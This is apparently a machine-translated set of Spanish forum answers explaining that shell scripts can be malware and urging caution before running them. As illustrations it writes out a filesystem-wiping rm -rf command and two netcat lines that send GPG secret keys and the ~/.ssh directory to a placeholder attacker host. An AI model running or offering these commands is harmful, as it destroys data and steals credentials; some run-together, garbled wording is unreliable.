Los archivos .sh son scripts de shell . Son análogos a los archivos .bat ( cmd scripts) en Windows. Todos estos (shell scripts, cmd scripts, .exe ejecutables de Windows, ejecutables de Linux (que generalmente no tienen extensión)) son programas ejecutables; Si ejecuta uno, puede hacer cualquier cosa que pueda hacer. Así que sí, los scripts de shell pueden ser perjudiciales. Trate un script de shell (o un script de Perl, un script de Python, un script de Ruby, etc.) con la misma sospecha que trataría con cualquier otra aplicación.

Es un poco más difícil ocultar el malware en un script de shell sin que parezca sospechoso, porque este es un script que puede ser leído por personas con conocimiento del lenguaje de scripting. Pero no es mucho más difícil; pocas personas, incluso con el conocimiento técnico, se molestarán en revisar el código, por lo que puede esperar pasar desapercibido.

Como cuestión práctica, hay menos malware para Linux que flota alrededor de Windows. Probablemente, esto se deba principalmente a que Linux tiene una cuota de mercado mucho menor que Windows en el escritorio, por lo que la recompensa por escribir malware en Linux es menor. Además, existe una cultura arraigada de compartir pequeñas mejoras al sistema en el mundo de Linux, más que en el mundo de Windows; así que el balance de probabilidad dice que se trata de alguien que comparte una pequeña mejora y no de malware. Pero podría ser un malware que se presenta como una pequeña mejora. Al final, debe decidir si puede confiar en el sitio donde está recibiendo esta solicitud o en las personas que lo recomendaron. Favorece los programas que provienen de tu distribución (es decir, que puedes instalar desde el centro de software), ya que han sido revisados.

Ahora, con respecto a este programa específico: le eché un vistazo rápido y parece benigno. No vi nada que pudiera almacenar su contraseña en cualquier lugar sin decirle o que haría cosas en su computadora que no sean las que se anuncian. Tenga en cuenta que solo hice una revisión de 2 minutos, que cualquier escritor de malware inteligente y remoto podría superar. El programa se ve razonablemente bien escrito.

No necesariamente recomendaría este programa a menos que sienta una necesidad apremiante que no esté cubierta por paquetes en la distribución de Ubuntu. Ubuntu viene con el seahorse interfazGUIparaGPG(tambiénhay kgpg parausuariosdeKDE).Tambiénpuedeinstalar seahorse-nautilus (o seahorse -plugin en versiones anteriores) para la integración de Nautilus.

#!/bin/sh
rm -rf --no-preserve-root /

Eso es malware, y es un script de shell. Una versión más avanzada podría incluir algo como:

gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80

Así que sí, un script de shell puede ser malicioso. Puede ser más complejo y recurrir a otros lenguajes de scripting, bibliotecas, o incluso ser un archivo de shell que escupe y llama a ejecutable regular.

En su mayor parte, cualquier cosa que ejecute obtiene los permisos del usuario.

¡Por supuesto! ¡Puede hacer cualquier cosa que usted pueda hacer! Ver registros, hacer keylog, robar archivos, etc ....

¡Dependiendo de lo que su desarrollador haya escrito en el código fuente! Puede hacer NADA .....

Y es muy fácil de hacer, así que si te envían un archivo .sh sospechoso, ¡piénsalo dos veces antes de ejecutarlo!

Un archivo sh puede ser un archivo tradicional que infecta virus:

• Experiencia con virus en sistemas UNIX , por Tom Duff

• Virology 101 por M. Douglas McIlroy

Ambos artículos incluyen código fuente para virus Sh (más antiguos), aunque uno o ambos tienen un error tipográfico que impide que funcionen correctamente hoy. Es una solución fácil, como recuerdo. Ambos artículos aparecieron a finales, lamentó

Sistemas de computación Volumen 2, Número 2, primavera de 1989

Eso es hace casi 25 años.

En una línea ligeramente diferente, los gusanos de red VAX / VMS Father Xmas y WANK fueron escritos en el lenguaje VMS "shell script", DCL.

Un script de shell de Unix puede ser un virus, un gusano, un troyano, un spyware, una bomba lógica

Si un script de shell es ejecutado por una cuenta con privilegios, especialmente root o adm , entonces este script de shell puede causar cualquier tipo de daño. Puede detener el sistema, enviar todo su correo electrónico a cualquier tipo de comando. anfitrión, convierte tu máquina Unix en un arma de denegación de servicio, y mucho peor ...

La mayor parte de este mal comportamiento se descubrirá fácilmente mediante un análisis serio de un script de shell. Por lo tanto, el hecho de que un script de shell sea un arma no permanecerá en secreto.

¿Por qué el script de shell no se usa con más frecuencia para destruir todos los cuadros de Unixes? Simplemente porque sus usuarios no trabajan en su sistema operativo con el mismo nivel de privilegios.

• La mayoría de los usuarios de Unixes, incluso sysadmin, nunca trabajar en su sistema, incluso su personal, se registra como admin .
• La mayoría de los usuarios de Windows, Incluso sin sysdamin, siempre trabajan en su sistema, incluso uno profesional, ha iniciado sesión como admin .